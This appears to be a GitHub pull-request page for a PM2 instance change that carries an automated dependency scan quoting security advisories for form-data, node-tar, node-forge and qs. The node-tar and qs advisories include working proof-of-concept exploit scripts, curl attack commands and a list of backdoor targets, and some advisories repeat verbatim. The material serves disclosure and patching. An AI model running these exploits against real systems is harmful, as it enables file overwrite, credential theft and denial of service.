You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Modified the PM2 production startup configuration to limit cluster instances from unlimited (max) to exactly 2 instances. This change reduces the number of Node.js processes spawned in production, potentially lowering memory consumption and improving resource management. The adjustment is made in the start script within the website/package.json file.
The pull request modifies the website/package.json start script, changing the PM2 cluster mode configuration from -i max to -i 2. This alters the number of instances spawned by pm2-runtime in the production startup command from utilizing all available CPU cores to explicitly spawning 2 instances. No other npm scripts or application code are affected.
Check skipped - CodeRabbit’s high-level summary is enabled.
Title check
✅ Passed
The title accurately describes the main change: modifying the PM2 cluster configuration from max instances to 2 instances, and meets the 75-character requirement.
Docstring Coverage
✅ Passed
No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.
✏️ Tip: You can configure your own custom pre-merge checks in the settings.
Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.
form-data uses Math.random() to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker:
can observe other values produced by Math.random in the target application, and
can control one field of a request made using form-data
Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, includes those used to generate form-data's boundary value. The allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request.
This is largely the same vulnerability as was recently found in undici by parrot409 -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.
An attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be a x-request-id header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. Math.random() is a fine place to get these sorts of IDs (in fact, opentelemetry uses Math.random for this purpose)
Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID).
Impact
For an application to be vulnerable, it must:
Use form-data to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array)
Reveal values of Math.random(). It's easiest if the attacker can observe multiple sequential values, but more complex math could recover the PRNG state to some degree of confidence with non-sequential values.
If an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.
tar7.4.3 (npm)
pkg:npm/tar@7.4.3
Improper Handling of Unicode Encoding
Affected range
<=7.5.3
Fixed version
7.5.4
CVSS Score
8.8
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L
EPSS Score
0.015%
EPSS Percentile
3rd percentile
Description
TITLE: Race Condition in node-tar Path Reservations via Unicode Sharp-S (ß) Collisions on macOS APFS
AUTHOR: Tomás Illuminati
Details
A race condition vulnerability exists in node-tar (v7.5.3) this is to an incomplete handling of Unicode path collisions in the path-reservations system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., ß and ss), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a PathReservations system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently.
// node-tar/src/path-reservations.ts (Lines 53-62)reserve(paths: string[],fn: Handler){paths=isWindows ?
['win32 parallelization disabled']
: paths.map(p=>{returnstripTrailingSlashes(join(normalizeUnicode(p)),// <- THE PROBLEM FOR MacOS FS).toLowerCase()})
In MacOS the join(normalizeUnicode(p)), FS confuses ß with ss, but this code does not. For example:
bash-3.2$ printf"CONTENT_SS\n"> collision_test_ss
bash-3.2$ ls
collision_test_ss
bash-3.2$ printf"CONTENT_ESSZETT\n"> collision_test_ß
bash-3.2$ ls -la
total 8
drwxr-xr-x 3 testuser staff 96 Jan 19 01:25 .
drwxr-x---+ 82 testuser staff 2624 Jan 19 01:25 ..
-rw-r--r-- 1 testuser staff 16 Jan 19 01:26 collision_test_ss
bash-3.2$
PoC
consttar=require('tar');constfs=require('fs');constpath=require('path');const{ PassThrough }=require('stream');constexploitDir=path.resolve('race_exploit_dir');if(fs.existsSync(exploitDir))fs.rmSync(exploitDir,{recursive: true,force: true});fs.mkdirSync(exploitDir);console.log('[*] Testing...');console.log(`[*] Extraction target: ${exploitDir}`);// Construct streamconststream=newPassThrough();constcontentA='A'.repeat(1000);constcontentB='B'.repeat(1000);// Key 1: "f_ss"constheader1=newtar.Header({path: 'collision_ss',mode: 0o644,size: contentA.length,});header1.encode();// Key 2: "f_ß"constheader2=newtar.Header({path: 'collision_ß',mode: 0o644,size: contentB.length,});header2.encode();// Write to streamstream.write(header1.block);stream.write(contentA);stream.write(Buffer.alloc(512-(contentA.length%512)));// Paddingstream.write(header2.block);stream.write(contentB);stream.write(Buffer.alloc(512-(contentB.length%512)));// Padding// Endstream.write(Buffer.alloc(1024));stream.end();// Extractconstextract=newtar.Unpack({cwd: exploitDir,// Ensure jobs is high enough to allow parallel processing if locks failjobs: 8});stream.pipe(extract);extract.on('end',()=>{console.log('[*] Extraction complete');// Check what existsconstfiles=fs.readdirSync(exploitDir);console.log('[*] Files in exploit dir:',files);files.forEach(f=>{constp=path.join(exploitDir,f);conststat=fs.statSync(p);constcontent=fs.readFileSync(p,'utf8');console.log(`File: ${f}, Inode: ${stat.ino}, Content: ${content.substring(0,10)}... (Length: ${content.length})`);});if(files.length===1||(files.length===2&&fs.statSync(path.join(exploitDir,files[0])).ino===fs.statSync(path.join(exploitDir,files[1])).ino)){console.log('\[*] GOOD');}else{console.log('[-] No collision');}});
Impact
This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using NFD Unicode normalization (in which ß and ss are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which ß causes an inode collision with ss)). This enables an attacker to circumvent internal parallelization locks (PathReservations) using conflicting filenames within a malicious tar archive.
Remediation
Update path-reservations.js to use a normalization form that matches the target filesystem's behavior (e.g., NFKD), followed by first toLocaleLowerCase('en') and then toLocaleUpperCase('en').
Users who cannot upgrade promptly, and who are programmatically using node-tar to extract arbitrary tarball data should filter out all SymbolicLink entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Affected range
<7.5.7
Fixed version
7.5.7
CVSS Score
8.2
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
EPSS Score
0.027%
EPSS Percentile
7th percentile
Description
Summary
node-tar contains a vulnerability where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory.
Details
The vulnerability exists in lib/unpack.js. When extracting a hardlink, two functions handle the linkpath differently:
Example: An application extracts a TAR using tar.extract({ cwd: '/var/app/uploads/' }). The TAR contains entry a/b/c/d/x as a hardlink to ../../../../etc/passwd.
Security check resolves the linkpath relative to the entry's parent directory: a/b/c/d/ + ../../../../etc/passwd = etc/passwd. No ../ prefix, so it passes.
Hardlink creation resolves the linkpath relative to the extraction directory (this.cwd): /var/app/uploads/ + ../../../../etc/passwd = /etc/passwd. This escapes to the system's /etc/passwd.
The security check and hardlink creation use different starting points (entry directory a/b/c/d/ vs extraction directory /var/app/uploads/), so the same linkpath can pass validation but still escape. The deeper the entry path, the more levels an attacker can escape.
PoC
Setup
Create a new directory with these files:
poc/
├── package.json
├── secret.txt ← sensitive file (target)
├── server.js ← vulnerable server
├── create-malicious-tar.js
├── verify.js
└── uploads/ ← created automatically by server.js
└── (extracted files go here)
package.json
{ "dependencies": { "tar": "^7.5.0" } }
secret.txt (sensitive file outside uploads/)
DATABASE_PASSWORD=supersecret123
server.js (vulnerable file upload server)
consthttp=require('http');constfs=require('fs');constpath=require('path');consttar=require('tar');constPORT=3000;constUPLOAD_DIR=path.join(__dirname,'uploads');fs.mkdirSync(UPLOAD_DIR,{recursive: true});http.createServer((req,res)=>{if(req.method==='POST'&&req.url==='/upload'){constchunks=[];req.on('data',c=>chunks.push(c));req.on('end',async()=>{fs.writeFileSync(path.join(UPLOAD_DIR,'upload.tar'),Buffer.concat(chunks));awaittar.extract({file: path.join(UPLOAD_DIR,'upload.tar'),cwd: UPLOAD_DIR});res.end('Extracted\n');});}elseif(req.method==='GET'&&req.url==='/read'){// Simulates app serving extracted files (e.g., file download, static assets)consttargetPath=path.join(UPLOAD_DIR,'d','x');if(fs.existsSync(targetPath)){res.end(fs.readFileSync(targetPath));}else{res.end('File not found\n');}}elseif(req.method==='POST'&&req.url==='/write'){// Simulates app writing to extracted file (e.g., config update, log append)constchunks=[];req.on('data',c=>chunks.push(c));req.on('end',()=>{consttargetPath=path.join(UPLOAD_DIR,'d','x');if(fs.existsSync(targetPath)){fs.writeFileSync(targetPath,Buffer.concat(chunks));res.end('Written\n');}else{res.end('File not found\n');}});}else{res.end('POST /upload, GET /read, or POST /write\n');}}).listen(PORT,()=>console.log(`http://localhost:${PORT}`));
# Setup
npm install
echo"DATABASE_PASSWORD=supersecret123"> secret.txt
# Terminal 1: Start server
node server.js
# Terminal 2: Execute attack
node create-malicious-tar.js
curl -X POST --data-binary @malicious.tar http://localhost:3000/upload
# READ ATTACK: Steal secret.txt content via the hardlink
curl http://localhost:3000/read
# Returns: DATABASE_PASSWORD=supersecret123# WRITE ATTACK: Overwrite secret.txt through the hardlink
curl -X POST -d "PWNED" http://localhost:3000/write
# Confirm secret.txt was modified
cat secret.txt
Impact
An attacker can craft a malicious TAR archive that, when extracted by an application using node-tar, creates hardlinks that escape the extraction directory. This enables:
Immediate (Read Attack): If the application serves extracted files, attacker can read any file readable by the process.
Conditional (Write Attack): If the application later writes to the hardlink path, it modifies the target file outside the extraction directory.
Remote Code Execution / Server Takeover
Attack Vector
Target File
Result
SSH Access
~/.ssh/authorized_keys
Direct shell access to server
Cron Backdoor
/etc/cron.d/*, ~/.crontab
Persistent code execution
Shell RC Files
~/.bashrc, ~/.profile
Code execution on user login
Web App Backdoor
Application .js, .php, .py files
Immediate RCE via web requests
Systemd Services
/etc/systemd/system/*.service
Code execution on service restart
User Creation
/etc/passwd (if running as root)
Add new privileged user
Data Exfiltration & Corruption
Overwrite arbitrary files via hardlink escape + subsequent write operations
Read sensitive files by creating hardlinks that point outside extraction directory
Corrupt databases and application state
Steal credentials from config files, .env, secrets
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets.
Details
The vulnerability exists in src/unpack.ts within the [HARDLINK] and [SYMLINK] methods.
1. Hardlink Escape (Arbitrary File Overwrite)
The extraction logic uses path.resolve(this.cwd, entry.linkpath) to determine the hardlink target. Standard Node.js behavior dictates that if the second argument (entry.linkpath) is an absolute path, path.resolve ignores the first argument (this.cwd) entirely and returns the absolute path.
The library fails to validate that this resolved target remains within the extraction root. A malicious archive can create a hardlink to a sensitive file on the host (e.g., /etc/passwd) and subsequently write to it, if file permissions allow writing to the target file, bypassing path-based security measures that may be in place.
2. Symlink Poisoning
The extraction logic passes the user-supplied entry.linkpath directly to fs.symlink without validation. This allows the creation of symbolic links pointing to sensitive absolute system paths or traversing paths (../../), even when secure extraction defaults are used.
PoC
The following script generates a binary TAR archive containing malicious headers (a hardlink to a local file and a symlink to /etc/passwd). It then extracts the archive using standard node-tar settings and demonstrates the vulnerability by verifying that the local "secret" file was successfully overwritten.
constfs=require('fs')constpath=require('path')consttar=require('tar')constout=path.resolve('out_repro')constsecret=path.resolve('secret.txt')consttarFile=path.resolve('exploit.tar')consttargetSym='/etc/passwd'// Cleanup & Setuptry{fs.rmSync(out,{recursive:true,force:true});fs.unlinkSync(secret)}catch{}fs.mkdirSync(out)fs.writeFileSync(secret,'ORIGINAL_DATA')// 1. Craft malicious Link header (Hardlink to absolute local file)consth1=newtar.Header({path: 'exploit_hard',type: 'Link',size: 0,linkpath: secret})h1.encode()// 2. Craft malicious Symlink header (Symlink to /etc/passwd)consth2=newtar.Header({path: 'exploit_sym',type: 'SymbolicLink',size: 0,linkpath: targetSym})h2.encode()// Write binary tarfs.writeFileSync(tarFile,Buffer.concat([h1.block,h2.block,Buffer.alloc(1024)]))console.log('[*] Extracting malicious tarball...')// 3. Extract with default secure settingstar.x({cwd: out,file: tarFile,preservePaths: false}).then(()=>{console.log('[*] Verifying payload...')// Test Hardlink Overwritetry{fs.writeFileSync(path.join(out,'exploit_hard'),'OVERWRITTEN')if(fs.readFileSync(secret,'utf8')==='OVERWRITTEN'){console.log('[+] VULN CONFIRMED: Hardlink overwrite successful')}else{console.log('[-] Hardlink failed')}}catch(e){}// Test Symlink Poisoningtry{if(fs.readlinkSync(path.join(out,'exploit_sym'))===targetSym){console.log('[+] VULN CONFIRMED: Symlink points to absolute path')}else{console.log('[-] Symlink failed')}}catch(e){}})
Impact
Arbitrary File Overwrite: An attacker can overwrite any file the extraction process has access to, bypassing path-based security restrictions. It does not grant write access to files that the extraction process does not otherwise have access to, such as root-owned configuration files.
Remote Code Execution (RCE): In CI/CD environments or automated pipelines, overwriting configuration files, scripts, or binaries leads to code execution. (However, npm is unaffected, as it filters out all Link and SymbolicLink tar entries from extracted packages.)
tar6.2.1 (npm)
pkg:npm/tar@6.2.1
Improper Handling of Unicode Encoding
Affected range
<=7.5.3
Fixed version
7.5.4
CVSS Score
8.8
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L
EPSS Score
0.015%
EPSS Percentile
3rd percentile
Description
TITLE: Race Condition in node-tar Path Reservations via Unicode Sharp-S (ß) Collisions on macOS APFS
AUTHOR: Tomás Illuminati
Details
A race condition vulnerability exists in node-tar (v7.5.3) this is to an incomplete handling of Unicode path collisions in the path-reservations system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., ß and ss), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a PathReservations system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently.
// node-tar/src/path-reservations.ts (Lines 53-62)reserve(paths: string[],fn: Handler){paths=isWindows ?
['win32 parallelization disabled']
: paths.map(p=>{returnstripTrailingSlashes(join(normalizeUnicode(p)),// <- THE PROBLEM FOR MacOS FS).toLowerCase()})
In MacOS the join(normalizeUnicode(p)), FS confuses ß with ss, but this code does not. For example:
bash-3.2$ printf"CONTENT_SS\n"> collision_test_ss
bash-3.2$ ls
collision_test_ss
bash-3.2$ printf"CONTENT_ESSZETT\n"> collision_test_ß
bash-3.2$ ls -la
total 8
drwxr-xr-x 3 testuser staff 96 Jan 19 01:25 .
drwxr-x---+ 82 testuser staff 2624 Jan 19 01:25 ..
-rw-r--r-- 1 testuser staff 16 Jan 19 01:26 collision_test_ss
bash-3.2$
PoC
consttar=require('tar');constfs=require('fs');constpath=require('path');const{ PassThrough }=require('stream');constexploitDir=path.resolve('race_exploit_dir');if(fs.existsSync(exploitDir))fs.rmSync(exploitDir,{recursive: true,force: true});fs.mkdirSync(exploitDir);console.log('[*] Testing...');console.log(`[*] Extraction target: ${exploitDir}`);// Construct streamconststream=newPassThrough();constcontentA='A'.repeat(1000);constcontentB='B'.repeat(1000);// Key 1: "f_ss"constheader1=newtar.Header({path: 'collision_ss',mode: 0o644,size: contentA.length,});header1.encode();// Key 2: "f_ß"constheader2=newtar.Header({path: 'collision_ß',mode: 0o644,size: contentB.length,});header2.encode();// Write to streamstream.write(header1.block);stream.write(contentA);stream.write(Buffer.alloc(512-(contentA.length%512)));// Paddingstream.write(header2.block);stream.write(contentB);stream.write(Buffer.alloc(512-(contentB.length%512)));// Padding// Endstream.write(Buffer.alloc(1024));stream.end();// Extractconstextract=newtar.Unpack({cwd: exploitDir,// Ensure jobs is high enough to allow parallel processing if locks failjobs: 8});stream.pipe(extract);extract.on('end',()=>{console.log('[*] Extraction complete');// Check what existsconstfiles=fs.readdirSync(exploitDir);console.log('[*] Files in exploit dir:',files);files.forEach(f=>{constp=path.join(exploitDir,f);conststat=fs.statSync(p);constcontent=fs.readFileSync(p,'utf8');console.log(`File: ${f}, Inode: ${stat.ino}, Content: ${content.substring(0,10)}... (Length: ${content.length})`);});if(files.length===1||(files.length===2&&fs.statSync(path.join(exploitDir,files[0])).ino===fs.statSync(path.join(exploitDir,files[1])).ino)){console.log('\[*] GOOD');}else{console.log('[-] No collision');}});
Impact
This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using NFD Unicode normalization (in which ß and ss are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which ß causes an inode collision with ss)). This enables an attacker to circumvent internal parallelization locks (PathReservations) using conflicting filenames within a malicious tar archive.
Remediation
Update path-reservations.js to use a normalization form that matches the target filesystem's behavior (e.g., NFKD), followed by first toLocaleLowerCase('en') and then toLocaleUpperCase('en').
Users who cannot upgrade promptly, and who are programmatically using node-tar to extract arbitrary tarball data should filter out all SymbolicLink entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Affected range
<7.5.7
Fixed version
7.5.7
CVSS Score
8.2
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
EPSS Score
0.027%
EPSS Percentile
7th percentile
Description
Summary
node-tar contains a vulnerability where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory.
Details
The vulnerability exists in lib/unpack.js. When extracting a hardlink, two functions handle the linkpath differently:
Example: An application extracts a TAR using tar.extract({ cwd: '/var/app/uploads/' }). The TAR contains entry a/b/c/d/x as a hardlink to ../../../../etc/passwd.
Security check resolves the linkpath relative to the entry's parent directory: a/b/c/d/ + ../../../../etc/passwd = etc/passwd. No ../ prefix, so it passes.
Hardlink creation resolves the linkpath relative to the extraction directory (this.cwd): /var/app/uploads/ + ../../../../etc/passwd = /etc/passwd. This escapes to the system's /etc/passwd.
The security check and hardlink creation use different starting points (entry directory a/b/c/d/ vs extraction directory /var/app/uploads/), so the same linkpath can pass validation but still escape. The deeper the entry path, the more levels an attacker can escape.
PoC
Setup
Create a new directory with these files:
poc/
├── package.json
├── secret.txt ← sensitive file (target)
├── server.js ← vulnerable server
├── create-malicious-tar.js
├── verify.js
└── uploads/ ← created automatically by server.js
└── (extracted files go here)
package.json
{ "dependencies": { "tar": "^7.5.0" } }
secret.txt (sensitive file outside uploads/)
DATABASE_PASSWORD=supersecret123
server.js (vulnerable file upload server)
consthttp=require('http');constfs=require('fs');constpath=require('path');consttar=require('tar');constPORT=3000;constUPLOAD_DIR=path.join(__dirname,'uploads');fs.mkdirSync(UPLOAD_DIR,{recursive: true});http.createServer((req,res)=>{if(req.method==='POST'&&req.url==='/upload'){constchunks=[];req.on('data',c=>chunks.push(c));req.on('end',async()=>{fs.writeFileSync(path.join(UPLOAD_DIR,'upload.tar'),Buffer.concat(chunks));awaittar.extract({file: path.join(UPLOAD_DIR,'upload.tar'),cwd: UPLOAD_DIR});res.end('Extracted\n');});}elseif(req.method==='GET'&&req.url==='/read'){// Simulates app serving extracted files (e.g., file download, static assets)consttargetPath=path.join(UPLOAD_DIR,'d','x');if(fs.existsSync(targetPath)){res.end(fs.readFileSync(targetPath));}else{res.end('File not found\n');}}elseif(req.method==='POST'&&req.url==='/write'){// Simulates app writing to extracted file (e.g., config update, log append)constchunks=[];req.on('data',c=>chunks.push(c));req.on('end',()=>{consttargetPath=path.join(UPLOAD_DIR,'d','x');if(fs.existsSync(targetPath)){fs.writeFileSync(targetPath,Buffer.concat(chunks));res.end('Written\n');}else{res.end('File not found\n');}});}else{res.end('POST /upload, GET /read, or POST /write\n');}}).listen(PORT,()=>console.log(`http://localhost:${PORT}`));
# Setup
npm install
echo"DATABASE_PASSWORD=supersecret123"> secret.txt
# Terminal 1: Start server
node server.js
# Terminal 2: Execute attack
node create-malicious-tar.js
curl -X POST --data-binary @malicious.tar http://localhost:3000/upload
# READ ATTACK: Steal secret.txt content via the hardlink
curl http://localhost:3000/read
# Returns: DATABASE_PASSWORD=supersecret123# WRITE ATTACK: Overwrite secret.txt through the hardlink
curl -X POST -d "PWNED" http://localhost:3000/write
# Confirm secret.txt was modified
cat secret.txt
Impact
An attacker can craft a malicious TAR archive that, when extracted by an application using node-tar, creates hardlinks that escape the extraction directory. This enables:
Immediate (Read Attack): If the application serves extracted files, attacker can read any file readable by the process.
Conditional (Write Attack): If the application later writes to the hardlink path, it modifies the target file outside the extraction directory.
Remote Code Execution / Server Takeover
Attack Vector
Target File
Result
SSH Access
~/.ssh/authorized_keys
Direct shell access to server
Cron Backdoor
/etc/cron.d/*, ~/.crontab
Persistent code execution
Shell RC Files
~/.bashrc, ~/.profile
Code execution on user login
Web App Backdoor
Application .js, .php, .py files
Immediate RCE via web requests
Systemd Services
/etc/systemd/system/*.service
Code execution on service restart
User Creation
/etc/passwd (if running as root)
Add new privileged user
Data Exfiltration & Corruption
Overwrite arbitrary files via hardlink escape + subsequent write operations
Read sensitive files by creating hardlinks that point outside extraction directory
Corrupt databases and application state
Steal credentials from config files, .env, secrets
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets.
Details
The vulnerability exists in src/unpack.ts within the [HARDLINK] and [SYMLINK] methods.
1. Hardlink Escape (Arbitrary File Overwrite)
The extraction logic uses path.resolve(this.cwd, entry.linkpath) to determine the hardlink target. Standard Node.js behavior dictates that if the second argument (entry.linkpath) is an absolute path, path.resolve ignores the first argument (this.cwd) entirely and returns the absolute path.
The library fails to validate that this resolved target remains within the extraction root. A malicious archive can create a hardlink to a sensitive file on the host (e.g., /etc/passwd) and subsequently write to it, if file permissions allow writing to the target file, bypassing path-based security measures that may be in place.
2. Symlink Poisoning
The extraction logic passes the user-supplied entry.linkpath directly to fs.symlink without validation. This allows the creation of symbolic links pointing to sensitive absolute system paths or traversing paths (../../), even when secure extraction defaults are used.
PoC
The following script generates a binary TAR archive containing malicious headers (a hardlink to a local file and a symlink to /etc/passwd). It then extracts the archive using standard node-tar settings and demonstrates the vulnerability by verifying that the local "secret" file was successfully overwritten.
constfs=require('fs')constpath=require('path')consttar=require('tar')constout=path.resolve('out_repro')constsecret=path.resolve('secret.txt')consttarFile=path.resolve('exploit.tar')consttargetSym='/etc/passwd'// Cleanup & Setuptry{fs.rmSync(out,{recursive:true,force:true});fs.unlinkSync(secret)}catch{}fs.mkdirSync(out)fs.writeFileSync(secret,'ORIGINAL_DATA')// 1. Craft malicious Link header (Hardlink to absolute local file)consth1=newtar.Header({path: 'exploit_hard',type: 'Link',size: 0,linkpath: secret})h1.encode()// 2. Craft malicious Symlink header (Symlink to /etc/passwd)consth2=newtar.Header({path: 'exploit_sym',type: 'SymbolicLink',size: 0,linkpath: targetSym})h2.encode()// Write binary tarfs.writeFileSync(tarFile,Buffer.concat([h1.block,h2.block,Buffer.alloc(1024)]))console.log('[*] Extracting malicious tarball...')// 3. Extract with default secure settingstar.x({cwd: out,file: tarFile,preservePaths: false}).then(()=>{console.log('[*] Verifying payload...')// Test Hardlink Overwritetry{fs.writeFileSync(path.join(out,'exploit_hard'),'OVERWRITTEN')if(fs.readFileSync(secret,'utf8')==='OVERWRITTEN'){console.log('[+] VULN CONFIRMED: Hardlink overwrite successful')}else{console.log('[-] Hardlink failed')}}catch(e){}// Test Symlink Poisoningtry{if(fs.readlinkSync(path.join(out,'exploit_sym'))===targetSym){console.log('[+] VULN CONFIRMED: Symlink points to absolute path')}else{console.log('[-] Symlink failed')}}catch(e){}})
Impact
Arbitrary File Overwrite: An attacker can overwrite any file the extraction process has access to, bypassing path-based security restrictions. It does not grant write access to files that the extraction process does not otherwise have access to, such as root-owned configuration files.
Remote Code Execution (RCE): In CI/CD environments or automated pipelines, overwriting configuration files, scripts, or binaries leads to code execution. (However, npm is unaffected, as it filters out all Link and SymbolicLink tar entries from extracted packages.)
An Uncontrolled Recursion (CWE-674) vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft deep ASN.1 structures that trigger unbounded recursive parsing. This leads to a Denial-of-Service (DoS) via stack exhaustion when parsing untrusted DER inputs.
Details
An ASN.1 Denial of Service (Dos) vulnerability exists in the node-forge asn1.fromDer function within forge/lib/asn1.js. The ASN.1 DER parser implementation (_fromDer) recurses for every constructed ASN.1 value (SEQUENCE, SET, etc.) and lacks a guard limiting recursion depth. An attacker can craft a small DER blob containing a very large nesting depth of constructed TLVs which causes the Node.js V8 engine to exhaust its call stack and throw RangeError: Maximum call stack size exceeded, crashing or incapacitating the process handling the parse. This is a remote, low-cost Denial-of-Service against applications that parse untrusted ASN.1 objects.
Impact
This vulnerability enables an unauthenticated attacker to reliably crash a server or client using node-forge for TLS connections or certificate parsing.
This vulnerability impacts the ans1.fromDer function in node-forge before patched version 1.3.2.
Any downstream application using this component is impacted. These components may be leveraged by downstream applications in ways that enable full compromise of availability.
Description
An Interpretation Conflict (CWE-436) vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft ASN.1 structures to desynchronize schema validations, yielding a semantic divergence that may bypass downstream cryptographic verifications and security decisions.
Details
A critical ASN.1 validation bypass vulnerability exists in the node-forge asn1.validate function within forge/lib/asn1.js. ASN.1 is a schema language that defines data structures, like the typed record schemas used in X.509, PKCS#7, PKCS#12, etc. DER (Distinguished Encoding Rules), a strict binary encoding of ASN.1, is what cryptographic code expects when verifying signatures, and the exact bytes and structure must match the schema used to compute and verify the signature. After deserializing DER, Forge uses static ASN.1 validation schemas to locate the signed data or public key, compute digests over the exact bytes required, and feed digest and signature fields into cryptographic primitives.
This vulnerability allows a specially crafted ASN.1 object to desynchronize the validator on optional boundaries, causing a malformed optional field to be semantically reinterpreted as the subsequent mandatory structure. This manifests as logic bypasses in cryptographic algorithms and protocols with optional security features (such as PKCS#12, where MACs are treated as absent) and semantic interpretation conflicts in strict protocols (such as X.509, where fields are read as the wrong type).
Impact
This flaw allows an attacker to desynchronize the validator, allowing critical components like digital signatures or integrity checks to be skipped or validated against attacker-controlled data.
Any downstream application using these components is impacted.
These components may be leveraged by downstream applications in ways that enable full compromise of integrity, leading to potential availability and confidentiality compromises.
The arrayLimit option in qs does not enforce limits for bracket notation (a[]=1&a[]=2), allowing attackers to cause denial-of-service via memory exhaustion. Applications using arrayLimit for DoS protection are vulnerable.
Details
The arrayLimit option only checks limits for indexed notation (a[0]=1&a[1]=2) but completely bypasses it for bracket notation (a[]=1&a[]=2).
Vulnerable code (lib/parse.js:159-162):
if(root==='[]'&&options.parseArrays){obj=utils.combine([],leaf);// No arrayLimit check}
The bracket notation handler at line 159 uses utils.combine([], leaf) without validating against options.arrayLimit, while indexed notation at line 175 checks index <= options.arrayLimit before creating arrays.
PoC
Test 1 - Basic bypass:
npm install qs
constqs=require('qs');constresult=qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6',{arrayLimit: 5});console.log(result.a.length);// Output: 6 (should be max 5)
Test 2 - DoS demonstration:
constqs=require('qs');constattack='a[]='+Array(10000).fill('x').join('&a[]=');constresult=qs.parse(attack,{arrayLimit: 100});console.log(result.a.length);// Output: 10000 (should be max 100)
Configuration:
arrayLimit: 5 (test 1) or arrayLimit: 100 (test 2)
Use bracket notation: a[]=value (not indexed a[0]=value)
Impact
Denial of Service via memory exhaustion. Affects applications using qs.parse() with user-controlled input and arrayLimit for protection.
Attack scenario:
Attacker sends HTTP request: GET /api/search?filters[]=x&filters[]=x&...&filters[]=x (100,000+ times)
Application parses with qs.parse(query, { arrayLimit: 100 })
qs ignores limit, parses all 100,000 elements into array
Server memory exhausted → application crashes or becomes unresponsive
Service unavailable for all users
Real-world impact:
Single malicious request can crash server
No authentication required
Easy to automate and scale
Affects any endpoint parsing query strings with bracket notation
Suggested Fix
Add arrayLimit validation to the bracket notation handler. The code already calculates currentArrayLength at line 147-151, but it's not used in the bracket notation handler at line 159.
Current code (lib/parse.js:159-162):
if(root==='[]'&&options.parseArrays){obj=options.allowEmptyArrays&&(leaf===''||(options.strictNullHandling&&leaf===null))
? []
: utils.combine([],leaf);// No arrayLimit check}
Fixed code:
